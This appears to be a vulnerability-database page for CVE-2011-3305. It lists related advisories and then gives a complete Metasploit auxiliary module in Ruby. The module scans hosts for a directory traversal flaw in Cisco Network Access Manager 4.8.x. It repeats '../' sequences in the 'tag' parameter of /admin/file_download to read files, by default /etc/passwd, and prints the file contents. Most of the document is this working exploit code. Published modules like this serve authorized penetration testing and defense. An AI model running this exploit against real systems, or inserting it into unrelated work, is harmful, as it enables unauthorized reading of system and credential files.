| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2011-3305 | 29 May 2018 15:50 | – | circl |
| Directory Traversal Vulnerability in Cisco Network Admission Control Manager | 5 Oct 2011 16:00 | – | cisco |
| CVE-2011-3305 | 6 Oct 2011 10:00 | – | cve |
| CVE-2011-3305 | 6 Oct 2011 10:00 | – | cvelist |
| Cisco Network Access Manager Directory Traversal Vulnerability | 18 Oct 2011 04:40 | – | metasploit |
| CVE-2011-3305 | 6 Oct 2011 10:55 | – | nvd |
| Directory traversal | 6 Oct 2011 10:55 | – | prion |
| Cisco Security Advisory: Directory Traversal Vulnerability in Cisco Network Admission Control Manager | 10 Oct 2011 00:00 | – | securityvulns |
| Cisco Network Admission Control Manager directory traversal | 10 Oct 2011 00:00 | – | securityvulns |

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability',
      'Description' => %q{
        This module tests whether a directory traversal vulnerability is present
        in versions of Cisco Network Access Manager 4.8.x. You may wish to change
        FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.
      },
      'References' =>
        [
          [ 'CVE', '2011-3305' ],
          [ 'OSVDB', '76080']
        ],
      'Author' => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ],
      'License' => MSF_LICENSE,
      'DefaultOptions' => {
        'SSL' => true
      }
    )

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
        OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),
      ])
  end

  def run_host(ip)
    # The traversal sequence is placed in the "tag" query parameter of
    # /admin/file_download; the fileType parameter is fixed to "snapshot".
    traversal = '../../'
    part1 = '/admin/file_download?tag='
    part2 = '&fileType=snapshot'

    begin
      print_status("Attempting to connect to #{rhost}:#{rport}")

      # Baseline request: only continue if /admin answers at all.
      res = send_request_raw(
        {
          'method' => 'GET',
          'uri' => '/admin',
        }, 25)

      if (res)
        # Repeat the traversal sequence 1..MAXDIRS times and stop at the
        # first HTTP 200 response.
        1.upto(datastore['MAXDIRS']) do |level|
          try = traversal * level
          traversalstring = part1 + try + datastore['FILE'] + part2
          res = send_request_raw(
            {
              'method' => 'GET',
              'uri' => traversalstring,
            }, 25)
          if (res and res.code == 200)
            print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}")
            break
          elsif (res and res.code)
            print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n")
          end
        end
      end
    # Connection and timeout errors are swallowed silently so that the
    # scanner moves on to the next host.
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    rescue ::Timeout::Error, ::Errno::EPIPE
    end
  end
end
```